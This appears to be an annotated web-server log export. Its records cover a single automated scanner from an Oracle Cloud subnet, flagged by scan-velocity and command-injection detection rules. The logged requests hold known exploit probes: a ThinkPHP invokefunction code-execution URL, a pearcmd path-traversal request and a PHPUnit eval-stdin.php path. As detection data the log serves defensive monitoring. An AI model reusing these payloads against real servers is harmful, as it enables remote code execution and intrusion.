Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:unique_paths
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
scan_velocity
rule
scanv:unique_paths
conf
90.00
details
upm_nonstatic_equiv=28.0; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity indicator: scanv:unique_paths
details
upm_nonstatic_equiv=28.0; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:rpm
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
scan_velocity
rule
scanv:rpm
conf
90.00
details
rpm_equiv=56.7; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity indicator: scanv:rpm
details
rpm_equiv=56.7; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:ext_enum
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
scan_velocity
rule
scanv:ext_enum
conf
90.00
details
ext_hits=75; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity indicator: scanv:ext_enum
details
ext_hits=75; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:404_ratio
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
scan_velocity
rule
scanv:404_ratio
conf
90.00
details
404=77/85(0.91); score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity indicator: scanv:404_ratio
details
404=77/85(0.91); score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510
ann scan_velocity label scan_velocity
Annotation facts
label
scan_velocity
rule
scanv:window
conf
details
window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity window summary
details
window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731428 GET 404 bytes 28510
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
url
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:07 event 16731420 GET 404 bytes 28510
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
url
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:07 event 16731417 GET 404 bytes 28510
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
url
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:06 event 16731413 GET 404 bytes 28510
ann scan_velocity 26 label scan_velocity
Request Scan-velocity indicator: scanv:rpm
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
scan_velocity
rule
scanv:rpm
conf
90.00
details
rpm_equiv=54.7; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']
url
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity indicator: scanv:rpm
details
rpm_equiv=54.7; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:06 event 16731413 GET 404 bytes 28510
ann scan_velocity 26 label scan_velocity
Request Scan-velocity indicator: scanv:ext_enum
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
scan_velocity
rule
scanv:ext_enum
conf
90.00
details
ext_hits=72; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']
url
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
referer
-
UA
Custom-AsyncHttpClient
summary
Scan-velocity indicator: scanv:ext_enum
details
ext_hits=72; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)